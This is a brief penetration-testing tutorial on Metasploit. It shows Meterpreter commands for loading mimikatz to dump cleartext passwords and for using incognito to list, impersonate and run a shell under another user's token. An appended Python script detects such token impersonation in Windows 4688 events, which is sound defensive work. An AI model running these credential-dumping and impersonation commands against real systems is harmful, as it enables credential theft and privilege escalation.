Metasploit: Token Stealing and Incognito

Load mimikatz in Meterpreter to dump cleartext passwords.

meterpreter > load mimikatz

msv
kerberos

Token Stealing

The Metasploit Framework includes an extension called incognito that allows us to perform activities such as token stealing and manipulation. These kinds of activities are important in the privilege escalation stage of a penetration test because if we can steal the token of an administrator, for example, we can perform higher-privilege operations on the target.

load incognito

list_tokens -u
impersonate_token xxxxx\\xxxxxxx
execute -f cmd.exe -i -t
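
A defender-side view of the execute -t step above, as an added example that is not part of the original page: Windows Security event 4688 (version 2) records both a Creator Subject and a Target Subject, so a process started under a token other than its creator's shows up as a mismatch between the two. The sample events are constructed, and the function names and severity rule are assumptions for illustration; process-creation auditing is assumed to be enabled.

```python
"""Flag 4688 process creations whose token belongs to a different account than the creator."""
import json

NULL_SID = "S-1-0-0"  # written to TargetUserSid when no explicit token was supplied
SHELLS = {"cmd.exe", "powershell.exe"}

# Constructed sample events (not real logs) using Security 4688 version 2 field names.
SAMPLE_EVENTS = r"""
{"EventID": 4688, "Computer": "WS01", "SubjectUserSid": "S-1-5-21-1-2-3-1105", "SubjectUserName": "jdoe", "TargetUserSid": "S-1-0-0", "TargetUserName": "-", "NewProcessName": "C:\\Windows\\System32\\notepad.exe"}
{"EventID": 4688, "Computer": "WS01", "SubjectUserSid": "S-1-5-21-1-2-3-1105", "SubjectUserName": "jdoe", "TargetUserSid": "S-1-5-21-1-2-3-500", "TargetUserName": "Administrator", "NewProcessName": "C:\\Windows\\System32\\cmd.exe"}
{"EventID": 4688, "Computer": "WS01", "SubjectUserSid": "S-1-5-18", "SubjectUserName": "WS01$", "TargetUserSid": "S-1-5-21-1-2-3-1105", "TargetUserName": "jdoe", "NewProcessName": "C:\\Windows\\System32\\taskhostw.exe"}
{"EventID": 4624, "Computer": "WS01", "TargetUserSid": "S-1-5-21-1-2-3-1105", "TargetUserName": "jdoe"}
"""


def basename(path):
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def find_token_mismatches(lines):
    """Return one finding per 4688 event where Target Subject differs from Creator Subject."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev.get("EventID") != 4688:
            continue
        creator, target = ev.get("SubjectUserSid", ""), ev.get("TargetUserSid", NULL_SID)
        if target in ("", NULL_SID) or target == creator:
            continue  # process inherited the creator's own token
        image = basename(ev.get("NewProcessName", ""))
        findings.append({
            "computer": ev.get("Computer"),
            "creator": ev.get("SubjectUserName"),
            "target": ev.get("TargetUserName"),
            "image": image,
            # An interactive shell under another account's token is the strongest signal;
            # everything else needs a baseline (services and scheduled tasks do this too).
            "severity": "high" if image in SHELLS else "review",
        })
    return findings


if __name__ == "__main__":
    for finding in find_token_mismatches(SAMPLE_EVENTS.splitlines()):
        print(finding)
```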